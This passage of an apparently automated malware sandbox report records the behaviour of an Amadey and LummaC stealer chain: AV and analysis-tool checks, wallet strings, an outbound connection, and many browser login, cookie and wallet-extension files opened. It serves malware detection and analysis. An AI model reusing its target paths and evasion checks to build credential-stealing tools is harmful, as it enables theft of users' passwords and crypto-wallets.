Source: ed15fdf974.exe, 0000002F.00000002.2989587124.0000000001B20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: 1b73492cb0.exe, 0000002D.00000002.2989040800.0000000000D7E000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: eProgram Manager
Source: ed15fdf974.exe, 0000002F.00000002.2989587124.0000000001B20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: ed15fdf974.exe, 0000002F.00000002.2989587124.0000000001B20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0037DD91 cpuid 6_2_0037DD91
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Queries volume information: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DBCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00DBCBEA
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.0000000001128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procdump.exe
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: procmon.exe
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: wireshark.exe
Source: 0516ff61af.exe, 00000007.00000003.2622110220.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667332038.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665947915.0000000001441000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: 0516ff61af.exe, 0516ff61af.exe, 00000007.00000003.2605595676.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2604916723.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 9.2.abcebc1047.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.abcebc1047.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.2.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.0.Gxtuum.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.skotes.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2985109960.0000000000361000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1805553534.0000000000361000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1760104861.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1798514482.0000000000361000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 0516ff61af.exe PID: 8100, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: ed15fdf974.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 0516ff61af.exe String found in binary or memory: Wallets/Electrum
Source: 0516ff61af.exe String found in binary or memory: Wallets/ElectronCash
Source: 0516ff61af.exe String found in binary or memory: Wallets/JAXX New Version
Source: 0516ff61af.exe String found in binary or memory: window-state.json
Source: 0516ff61af.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 0516ff61af.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 0516ff61af.exe String found in binary or memory: Wallets/Ethereum
Leaks process information
Source: global traffic TCP traffic: 192.168.2.4:49901 -> 185.121.15.192:80
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
